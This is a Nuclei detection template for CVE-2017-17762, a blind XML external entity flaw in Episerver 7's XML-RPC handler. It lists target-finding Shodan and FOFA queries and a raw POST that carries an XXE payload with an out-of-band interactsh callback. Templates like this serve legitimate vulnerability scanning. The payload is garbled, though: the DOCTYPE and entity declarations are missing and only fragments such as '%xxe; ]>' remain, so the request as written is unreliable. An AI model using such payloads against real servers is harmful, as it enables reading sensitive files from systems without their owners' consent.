id: CVE-2017-17762 info: name: Episerver 7 - Blind XML External Entity Injection author: pussycat0x severity: high description: | Episerver 7 patch 4 and earlier contains an XML external entity (XXE) caused by processing crafted DTD in XML requests involving util/xmlrpc/Handler.ashx, letting remote attackers read arbitrary files, exploit requires sending malicious XML payloads. impact: | Remote attackers can read sensitive files from the server, leading to information disclosure. remediation: | Update to the latest version of Episerver or apply security patches that fix XXE vulnerabilities. reference: - https://gist.github.com/jonaslejon/5f92779848360a1a1e676af0795bd9aa - https://kryptera.se/sarbarhet-i-episerver/ - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-17762 cwe-id: CWE-611 epss-score: 0.01249 epss-percentile: 0.79646 cpe: cpe:2.3:a:episerver:episerver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: episerver product: episerver shodan-query: - http.html:"episerver" - cpe:"cpe:2.3:a:episerver:episerver" - http.html:"epihash" fofa-query: - body="episerver" - body="epihash" tags: cve,cve2017,xxe,oast,episerver,oob,vkev flow: http(1) && http(2) http: - raw: - | GET /util/xmlrpc/Handler.ashx HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "EPiServer")' - 'status_code == 200' condition: and internal: true - raw: - | POST /util/xmlrpc/Handler.ashx HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml Accept: */* %xxe; ]> system.listMethods matchers: - type: dsl dsl: - "contains(interactsh_protocol,'dns')" - 'status_code == 200 || status_code == 500' condition: and # digest: 4a0a0047304502202f40725eae0fe02ee1f6cd8993a4d4083aa4f8ca9917a70a187866eb267580c5022100a0a22f1abfea062eae833b7353fd36d8f2e9a15f260b1084468cbc027e66205b:922c64590222798bb761d5b6d8e72950